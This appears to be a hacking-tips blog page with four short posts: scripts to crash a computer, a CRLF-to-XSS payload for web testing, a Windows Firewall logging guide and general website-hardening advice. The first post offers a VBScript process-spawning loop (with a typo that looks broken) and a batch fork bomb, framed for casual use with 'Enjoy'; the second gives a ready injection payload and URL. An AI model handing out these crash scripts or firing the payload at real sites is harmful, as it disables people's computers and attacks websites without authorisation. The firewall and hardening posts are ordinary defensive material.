Latest
Loading...
How to crash computer With 1 Simple Click

How to crash computer With 1 Simple Click

 🔥 How to crash computer With 1 Simple Click 🔥






Open Notepad .. Copy this codes


1) 


Dim WSHSHELL

Set

Wshshell=wscript.creatobject("wscript.shell")


Dim x

For x = 1 to 100000000

Wshshell.run "tourstart.exe"


Next Save It As Anything.vbs


2)


 :1

start

goto :1


Enjoy 👍❤️

 Raise CRLF to XSS

Raise CRLF to XSS

 🔰  Raise CRLF to XSS






If you find a CRLF injection while testing a website, then you should always try to upgrade it to XSS and get a higher reward.


CRLF: 

/%0AHeader:header

XSS + CRLF: 

/%0ASet-Cookie:"><img src=x onerror=alert(1)>

URL: 

https://website.com/%0ASet-Cookie:"><img src=x onerror=alert(1)>

How to track Internet Activity Using Windows Firewall

How to track Internet Activity Using Windows Firewall

 ❇️ How to track Internet Activity Using Windows Firewall





••••••••••••••••••••••••••••••••••••••••••••••••••

🔹Step 1: First of all, open Windows 10 search and type in ‘Firewall.’ Open the Windows Defender Firewall option.


🔹Step 2: On the next page, click on the ‘Advanced Settings’ option.


🔹Step 3: Select the “Windows Firewall with Advanced Security on Local Computer” option placed on the left pane to access the Log settings. After that, click on the properties from the right pane.


🔹Step 4: You can see up the “Logging” option for all the tabs. Here’s what each tab represents.


▪️Domain Profile: This is a profile that you need to access if you are working on the connection that is Wifi network where the domain name is given by the Domain controller. You may not need to access this profile, as it is not usually used in home networks.


▪️Private Profile: This is the profile you will require to access if you are working on any private network connection. This also includes your home and personal networks. This is the selection you are more likely to access.


▪️Public Profile: This is the profile you will require to access if you are working on any public network connection like Public WiFi. Depending on the type of connection, you have just selected up the Log option for that tab only.


🔹Step 5: Now the time comes where you will; have to start the Logging process. To do that, Just set up both of the drops down menus to “Yes” and then come out of the Panel by clicking the OK button.


🔹Step 6: After the above step is completed, the computer will start logging the whole firewall activity. To view the log, head to the Advanced Settings window, click the “Monitoring” option on the left, and then under the “Logging Settings,” Click the link behind the File name.


🔹Step 7: This file is the Log file, and hence it will open on the device’s screen.


    🟢 That's it, this tutor from Hackerzhome will help you track your internet Activity using Firewall.


Keep supporting us❤️

How to protect your Website against hacks

How to protect your Website against hacks

 👨‍💻How to protect your Website against hacks?🗳




An organization can adopt the following policy to protect itself against web server attacks.


🌀SQL Injection– sanitizing and validating user parameters before submitting them to the database for processing can help reduce the chances of been attacked via SQL Injection. Database engines such as MS SQL Server, MySQL, etc. support parameters, and prepared statements. They are much safer than traditional SQL statements


🌀Denial of Service Attack - firewalls can be used to drop traffic from suspicious IP address if the attack is a simple DoS. Proper configuration of networks and Intrusion Detection System can also help reduce the chances of a DoS attack been successful.


🌀Cross Site Scripting - validating and sanitizing headers, parameters passed via the URL, form parameters and hidden values can help reduce XSS attacks.


🌀Cookie/Session Poisoning– this can be prevented by encrypting the contents of the cookies, timing out the cookies after some time, associating the cookies with the client IP address that was used to create them.


🌀Form tempering – this can be prevented by validating and verifying the user input before processing it.


🌀Code Injection - this can be prevented by treating all parameters as data rather than executable code. Sanitization and Validation can be used to implement this.


🌀Defacement – a good web application development security policy should ensure that it seals the commonly used vulnerabilities to access the web server. This can be a proper configuration of the operating system, web server software, and best security practices when developing web applications.